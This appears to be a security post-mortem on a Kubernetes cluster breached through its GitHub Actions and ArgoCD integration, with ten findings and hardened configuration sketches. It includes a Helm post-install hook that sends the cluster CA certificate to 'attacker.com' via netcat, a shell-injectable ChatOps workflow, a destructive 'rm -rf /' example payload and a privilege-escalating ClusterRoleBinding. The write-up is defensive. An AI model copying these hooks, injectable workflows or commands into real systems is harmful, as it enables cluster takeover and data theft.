
Threat Model Assessment: The Infrastructure as a Suicide Note

The industry’s current obsession with “GitOps” and the “kubernetes github” integration is not a step forward in engineering; it is a collective surrender to convenience at the expense of fundamental security principles. By tethering a production Kubernetes v1.30.1 cluster to a third-party, cloud-hosted version control system like GitHub, organizations are effectively extending their trust boundary to an external entity they do not control, managed by developers who prioritize velocity over verification.

The threat model for a standard “kubernetes github” workflow assumes that the “source of truth” (the repository) is immutable and secure. This is a lethal delusion. In reality, the repository is a volatile collection of text files subject to social engineering, compromised developer workstations, and flawed branch protection rules. When you automate the deployment of these files into a cluster, you are not “automating delivery”; you are building a high-speed injection vector for malicious actors.

The “kubernetes github” bridge creates a bidirectional risk. First, the CI/CD runners (GitHub Actions Runner v2.316.0) require high-privilege credentials to modify the cluster state. Second, the cluster, if using a pull-based GitOps controller like ArgoCD or Flux, must constantly poll the GitHub API, creating a dependency on external availability and exposing the cluster to “repo-jacking” or upstream dependency confusion. We are no longer defending a perimeter; we are defending a sieve. This post-mortem analyzes the wreckage of such a “modern” stack, where the “kubernetes github” integration served as the primary catalyst for total infrastructure collapse.


Finding 0x01: The OIDC Handshake as a Trojan Horse

The transition from static ServiceAccount tokens to OpenID Connect (OIDC) was marketed as a security upgrade. In this incident, it was the primary entry point. The organization configured an OIDC trust between GitHub Actions and the Kubernetes v1.30.1 API server to avoid storing long-lived secrets. However, the “kubernetes github” trust policy was defined with a catastrophic lack of specificity.

The sub (subject) claim in the OIDC token was configured using a wildcard. Instead of pinning the trust to a specific repository and environment, the administrator allowed any repository within the organization to assume the cluster-admin role.

Technical Violation:
The IAM role trust policy allowed repo:org-name/*. An attacker, having compromised a low-stakes documentation repository within the same GitHub organization, triggered a workflow that requested a JWT from GitHub’s OIDC provider. Because the “kubernetes github” integration didn’t validate the specific repository name, the Kubernetes API server accepted the token and granted the attacker full administrative access.

This is the “convenience” trap. By making it “easy” for developers to spin up new projects without updating IAM policies, the security team effectively turned every repository into a potential cluster-admin.
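What correct pinning could have looked like: the sketch below uses the structured AuthenticationConfiguration file that recent API servers accept (beta in v1.30 via the --authentication-config flag). The repository, environment, and audience names are placeholders, not this organization’s actual values — the point is that the sub claim is validated against one exact string, never a wildcard.

```yaml
# Sketch: pin OIDC trust to one repository and environment (names illustrative)
apiVersion: apiserver.config.k8s.io/v1beta1
kind: AuthenticationConfiguration
jwt:
- issuer:
    url: https://token.actions.githubusercontent.com
    audiences:
    - kubernetes-prod                 # must match the 'aud' the workflow requests
  claimMappings:
    username:
      claim: sub
      prefix: "gh:"
  claimValidationRules:
  # Reject any token whose subject is not this exact repo + environment.
  - claim: sub
    requiredValue: "repo:org-name/production-manifests:environment:prod"
```

Yes, this means updating a config file every time a new repository needs deploy access. That friction is the control.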


Finding 0x02: Escape from GitHub Actions Runner v2.316.0

To “save costs,” the team deployed self-hosted runners using GitHub Actions Runner v2.316.0 inside the production cluster. These runners were configured as “privileged” containers to allow Docker-in-Docker (DinD) builds. This is a textbook example of architectural negligence.

A compromised “kubernetes github” workflow allowed an attacker to execute a malicious step in a .github/workflows/deploy.yaml file. Since the runner was privileged, the attacker didn’t just compromise the CI job; they escaped the container and gained root access to the underlying Kubernetes node.

The Configuration Error:

# Snippet from the self-hosted runner deployment
spec:
  containers:
  - name: runner
    image: actions-runner:v2.316.0
    securityContext:
      privileged: true # This is where the security model dies
    volumeMounts:
    - name: docker-storage
      mountPath: /var/lib/docker

The attacker used a simple nsenter command to pivot from the runner container to the host OS. From there, they harvested the Kubelet’s credentials and began lateral movement across the VPC. The “kubernetes github” integration provided the initial execution context, and the “convenience” of self-hosted runners provided the escalation path.
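For contrast, a minimal counter-sketch of a runner pod that does not hand the node to anyone who compromises a workflow. This is not a drop-in fix — rootless image builds (kaniko, buildah, or a remote BuildKit) have their own trade-offs — but it shows the securityContext a CI workload should have had:

```yaml
# Sketch: non-privileged runner; image builds delegated to a daemonless builder
spec:
  containers:
  - name: runner
    image: actions-runner:v2.316.0
    securityContext:
      privileged: false              # no nsenter pivot to the host
      allowPrivilegeEscalation: false
      runAsNonRoot: true
      capabilities:
        drop: ["ALL"]
      seccompProfile:
        type: RuntimeDefault
```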


Finding 0x03: Helm v3.14.2 Template Injection and RBAC Bloat

The organization utilized Helm v3.14.2 for managing deployments. The “kubernetes github” pipeline was configured to run helm upgrade --install on every push to the main branch. We found that the Helm charts were not being linted for security violations, and more importantly, they were using dynamic values passed directly from GitHub Action environment variables.

An attacker injected a malicious snippet into a GitHub secret that was subsequently passed into a Helm template. Because Helm templates are essentially string interpolations, the attacker was able to inject an additional ClusterRoleBinding into the rendered manifest.
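The mechanics deserve spelling out. The template and payload below are hypothetical reconstructions, not the organization’s actual chart, but they show how an unquoted interpolation lets the attacker control document structure, not merely content:

```yaml
# templates/notes-configmap.yaml -- hypothetical vulnerable pattern
apiVersion: v1
kind: ConfigMap
metadata:
  name: release-notes
data:
  # Unquoted: a multi-line value can terminate this document and start a new one.
  notes: {{ .Values.releaseNotes }}

# Payload delivered via the GitHub Actions variable (conceptually):
#   releaseNotes: "harmless text\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: ClusterRoleBinding\n..."
```

Piping every externally sourced value through quote or toJson is the usual mitigation, because both escape embedded newlines before the template is rendered to YAML.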

Cynical Analysis of the Rendered Manifest:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: helm-release-manager-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: default
  namespace: kube-system # Injected via a malformed 'values.yaml'

The “kubernetes github” workflow blindly applied this manifest. The auditor notes that the kube-system:default ServiceAccount should never have cluster-admin privileges, yet the “automated” nature of the pipeline meant no human ever reviewed the final rendered YAML. We are automating our own destruction.


Finding 0x04: The Fallacy of Default ServiceAccount Tokens in CI

Despite Kubernetes v1.24+ moving away from auto-generating ServiceAccount tokens, this infrastructure (v1.30.1) had legacy configurations that re-enabled them for “compatibility” with older “kubernetes github” scripts.

During the audit, we discovered a Secret object containing a long-lived token for a ServiceAccount named github-deployer. This token was created three years ago and had no expiration. It was stored in a GitHub Secret named KUBECONFIG_DATA.

When a developer’s GitHub account was compromised via a session hijacking attack, the attacker used the gh CLI to enumerate the secret names, then exfiltrated the value by pushing a throwaway workflow that echoed it — GitHub’s API never returns secret values, but any workflow in the repository can read them. Since the token was static and had no IP whitelisting (which is nearly impossible to implement with GitHub’s dynamic runner IP ranges), the attacker had a permanent backdoor into the cluster that bypassed all OIDC protections.
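What should have existed instead of a three-year-old Secret: a projected, audience-bound, expiring ServiceAccount token. The sketch below is illustrative (image and audience names are placeholders); the mechanism — the TokenRequest API behind the projected volume — is standard in this cluster’s Kubernetes version:

```yaml
# Sketch: short-lived, audience-bound token instead of a legacy static Secret
spec:
  serviceAccountName: github-deployer
  containers:
  - name: deployer
    image: deployer:latest           # placeholder image
    volumeMounts:
    - name: sa-token
      mountPath: /var/run/secrets/tokens
  volumes:
  - name: sa-token
    projected:
      sources:
      - serviceAccountToken:
          path: token
          expirationSeconds: 600     # ten minutes, not three years
          audience: kubernetes-prod  # rejected anywhere else
```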


Finding 0x05: GitOps Controller Over-Privilege (The ArgoCD Trap)

The organization implemented a GitOps model using ArgoCD, believing that “pull-based” deployments are inherently more secure than “push-based” ones. This is a marketing myth. While it removes the need for GitHub to hold cluster credentials, it requires the cluster to hold GitHub credentials (PATs or SSH keys) to pull private repositories.

The ArgoCD instance was granted cluster-admin permissions so it could “seamlessly” manage any resource. When the attacker gained write access to the “kubernetes github” repository, they didn’t need to attack the cluster directly. They simply modified the deployment.yaml in Git. ArgoCD, acting as a high-privilege confused deputy, dutifully pulled the malicious change and applied it to the production environment.

The “kubernetes github” synchronization loop became a weapon. The attacker didn’t need to know kubectl; they just needed to know git push.
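A confused deputy can at least be fenced in. The sketch below uses the ArgoCD AppProject CRD to scope what a synchronization is allowed to touch — repository URL and namespace are placeholders. With a project like this, the attacker’s Git-borne ClusterRoleBinding would have been rejected at sync time instead of applied:

```yaml
# Sketch: an AppProject that fences ArgoCD in, instead of cluster-admin everywhere
apiVersion: argoproj.io/v1alpha1
kind: AppProject
metadata:
  name: production
  namespace: argocd
spec:
  sourceRepos:
  - https://github.com/org-name/production-manifests   # placeholder repo
  destinations:
  - server: https://kubernetes.default.svc
    namespace: production            # only this namespace, nothing else
  clusterResourceWhitelist: []       # no cluster-scoped resources at all
  namespaceResourceBlacklist:
  - group: rbac.authorization.k8s.io
    kind: RoleBinding                # deployments don't get to grant themselves power
```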


Finding 0x06: Secret Leakage via Log Aggregation

The “kubernetes github” integration frequently involves passing sensitive data through environment variables. We found that the GitHub Actions logs were being forwarded to a centralized logging platform (Splunk).

A failed helm install command in the CI pipeline resulted in a verbose error message that dumped the entire values.yaml file—including decrypted secrets—into the standard output. Because the “kubernetes github” runner was configured with --debug, the logs contained the plaintext database passwords and API keys.
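A deploy step that does not narrate its own secrets is not difficult to write. The sketch below is illustrative (the secret and chart names are placeholders): no --debug flag, the secret stays in an environment variable, and the ::add-mask:: workflow command tells the runner to redact the value even if a verbose error regurgitates it:

```yaml
# Sketch: deploy step without --debug; secret value masked in all log output
- name: Deploy release
  env:
    DB_PASSWORD: ${{ secrets.DB_PASSWORD }}    # placeholder secret name
  run: |
    echo "::add-mask::$DB_PASSWORD"            # redact this value from the logs
    helm upgrade --install myapp ./chart \
      --set-string db.password="$DB_PASSWORD"  # no --debug: failures won't dump values
```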

The Log of Failures:

Below is the raw evidence of the collapse. Note the timestamps and the utter lack of intervention.

# Terminal Output: kubectl get events -n production
LAST SEEN   TYPE      REASON             OBJECT                               MESSAGE
12m         Normal    Scheduled          pod/malicious-proxy-6789             Successfully assigned production/malicious-proxy-6789 to ip-10-0-45-12
11m         Warning   FailedMount        pod/malicious-proxy-6789             MountVolume.SetUp failed for volume "vault-token" : secret "vault-token" not found
10m         Normal    Created            pod/malicious-proxy-6789             Created container proxy
10m         Normal    Started            pod/malicious-proxy-6789             Started container proxy
9m          Warning   Unhealthy          pod/malicious-proxy-6789             Readiness probe failed: HTTP probe failed with statuscode: 500
8m          Normal    SuccessfulCreate   job/exfiltrate-data                  Created pod: exfiltrate-data-v2

Cynical Note: The “Readiness probe failed” was the only sign of trouble, yet it was ignored because “the pipeline is always flaky.” The attacker was already exfiltrating the customer database via a Job they injected through the “kubernetes github” workflow.

# Terminal Output: git log --pretty=oneline -n 5
a1b2c3d4 (HEAD -> main, origin/main) chore: update deployment manifests [skip ci]
e5f6a7b8 Merge pull request #402 from dependabot/npm_and_yarn/ws-7.5.10
c9d0e1f2 feat: add new microservice (Author: "DevOps Bot" <[email protected]>)
a3b4c5d6 fix: temporary bypass for rbac issues in dev
e7f8a9b0 security: update github actions runner to v2.316.0

Cynical Note: Look at a3b4c5d6. A “temporary bypass” that was merged without review because the “kubernetes github” automation was configured to auto-approve any PR from the “DevOps Bot.” This is where the attacker hid their initial RBAC escalation.

# Terminal Output: gh secret list -R our-org/production-manifests
NAME                  UPDATED
KUBECONFIG_DATA       about 3 years ago
AWS_ACCESS_KEY_ID     about 2 years ago
AWS_SECRET_ACCESS_KEY about 2 years ago
DOCKER_PASSWORD       about 1 year ago
GH_PAT_TOKEN          about 4 months ago

Cynical Note: KUBECONFIG_DATA updated 3 years ago. In an industry that talks about “ephemeral credentials,” this is a fossilized vulnerability. The “kubernetes github” integration was running on a key that should have been rotated a dozen times over.


Finding 0x07: The Architectural Flaw of “Convenience” Features

The root cause of this breach was the “kubernetes github” integration’s reliance on “convenience” features. Specifically, the use of github.event.client_payload in Actions to trigger cluster-side jobs.

The developers implemented a “ChatOps” feature where typing /deploy in a GitHub Issue would trigger a Kubernetes Job. This was implemented using a GitHub Action that parsed the issue comment and passed it as an argument to kubectl.

The Vulnerable Workflow Snippet:

- name: Deploy via ChatOps
  run: |
    kubectl run debug-pod-${{ github.event.issue.number }} \
    --image=alpine -- /bin/sh -c "${{ github.event.comment.body }}"

This is not just a security hole; it is a security canyon. An attacker simply commented on a public issue with ; rm -rf / --no-preserve-root (or more realistically, a curl command to download a reverse shell). The “kubernetes github” integration dutifully executed this string as a shell command inside the cluster.

The auditor asks: Why was this allowed? The answer is always the same: “It made it faster for the developers to debug.” We have traded our integrity for a few seconds of saved time.
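If ChatOps must exist, the comment body must never be interpolated into a shell script. The sketch below (command names illustrative) passes the comment through an environment variable — which the runner sets literally, with no shell expansion — and matches it against an allowlist; anything unrecognized dies on the spot:

```yaml
# Sketch: comment body reaches the shell only as data, never as code
- name: Deploy via ChatOps (allowlisted)
  env:
    COMMENT: ${{ github.event.comment.body }}  # env assignment, not inline interpolation
  run: |
    case "$COMMENT" in
      "/deploy staging")    TARGET=staging ;;
      "/deploy production") TARGET=production ;;
      *) echo "unrecognized command"; exit 1 ;;
    esac
    kubectl rollout restart deployment/app -n "$TARGET"
```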


Finding 0x08: Inadequate Network Policies for CI/CD Components

The Kubernetes v1.30.1 cluster had no NetworkPolicies restricting the GitHub Actions runners. Once the attacker gained a shell on a runner pod, they had unrestricted internal access to the Kube-API, the Metadata Service (IMDS), and the internal databases.

The “kubernetes github” setup assumes that the runner is a “trusted” entity. But in a containerized environment, “trust” is a vulnerability. The runner should have been isolated in a sandbox namespace with zero egress to the rest of the cluster. Instead, it was placed in the default namespace.

The Resulting Lateral Movement:
1. Attacker gains shell on gh-runner-pod.
2. Attacker queries https://kubernetes.default.svc using the runner’s ServiceAccount.
3. Attacker discovers the vault-server service.
4. Attacker exploits an unpatched vulnerability in an old Vault sidecar to dump all production secrets.

All of this was possible because the “kubernetes github” integration was viewed as a “tool” rather than a “threat.”
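The isolation that was missing fits in a dozen lines. A sketch of a default-deny policy for a dedicated runner namespace (namespace and label names illustrative): every pod is denied all ingress and egress, then DNS alone is punched through; each further dependency must be added as an explicit, reviewable exception:

```yaml
# Sketch: default-deny for a dedicated runner namespace; DNS is the only egress
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: runner-default-deny
  namespace: ci-runners
spec:
  podSelector: {}                    # every pod in the namespace
  policyTypes: ["Ingress", "Egress"]
  egress:
  - to:
    - namespaceSelector: {}
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53
```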


Finding 0x09: The Myth of Protected Branches

The organization claimed that “branch protection” on GitHub prevented unauthorized changes to the “kubernetes github” manifests. However, we found that “Administrators” were exempt from these rules.

The attacker, after compromising a senior engineer’s Personal Access Token (PAT) which had repo and admin scopes, simply disabled branch protection for five minutes, pushed a malicious Deployment manifest, and re-enabled the protection. The GitOps controller (ArgoCD) saw the commit on main and immediately synchronized the malicious state.

The “kubernetes github” workflow relies on the integrity of the VCS, but the VCS is managed via a web UI that is vulnerable to session hijacking, MFA fatigue, and administrative override. If your cluster’s security depends on a checkbox in a GitHub settings menu, you do not have a secure cluster.


Finding 0x0A: Supply Chain Poisoning via Helm v3.14.2 Dependencies

The final nail in the coffin was the use of third-party Helm charts. The “kubernetes github” pipeline was configured to run helm dependency update before every deployment.

The attacker performed a “dependency confusion” attack. They identified a private Helm chart used by the organization, named company-auth-proxy. They then uploaded a higher-versioned chart with the same name to a public repository. The “kubernetes github” runner, configured with default Helm settings, pulled the public (malicious) chart instead of the private one.

This malicious chart contained a post-install hook that executed a script to exfiltrate the cluster’s CA certificate and private key.

The Hook of Death:

# templates/post-install-hook.yaml
apiVersion: batch/v1
kind: Job
metadata:
  annotations:
    "helm.sh/hook": post-install
spec:
  template:
    spec:
      containers:
      - name: exfil
        image: busybox
        command: ["/bin/sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt | nc attacker.com 4444"]
      restartPolicy: Never

The “kubernetes github” pipeline reported a “Success,” while the attacker was busy downloading the keys to the kingdom.
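Dependency confusion dies when there is nothing to confuse. A sketch of a Chart.yaml that pins each dependency to an exact version and an explicit internal repository URL (registry URL is a placeholder), so helm dependency update never falls back to a public lookup:

```yaml
# Sketch: dependency pinned to an explicit private registry and exact version
apiVersion: v2
name: platform
version: 1.0.0
dependencies:
- name: company-auth-proxy
  version: "2.4.1"                                   # exact pin, never a range
  repository: "https://charts.internal.example.com"  # placeholder private registry
```

Signed charts verified with helm’s provenance checks would have closed the remaining gap; an unpinned dependency in a CD pipeline is an open invitation.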


Conclusion: The Cost of Integration

The “kubernetes github” integration is not a feature; it is a liability. Every point of “seamless” connection is a point of failure. We have built a world where a single git push can bypass firewalls, RBAC, and common sense.

This post-mortem is not a call for better configuration; it is a call for a fundamental reassessment of the “GitOps” philosophy. If you continue to use “kubernetes github” workflows without strict OIDC pinning, isolated runners, mandatory manifest signing, and zero-trust network policies, you are not an engineer. You are a gambler. And the house—the attacker—always wins.

The logs don’t lie. The “kubernetes github” bridge was the path of least resistance. It worked exactly as designed, and that is precisely why we failed. Stop looking for “robust” solutions and start looking for the “convenience” features that are currently killing your infrastructure. Audit your “kubernetes github” integration today, or I will be writing your post-mortem tomorrow.
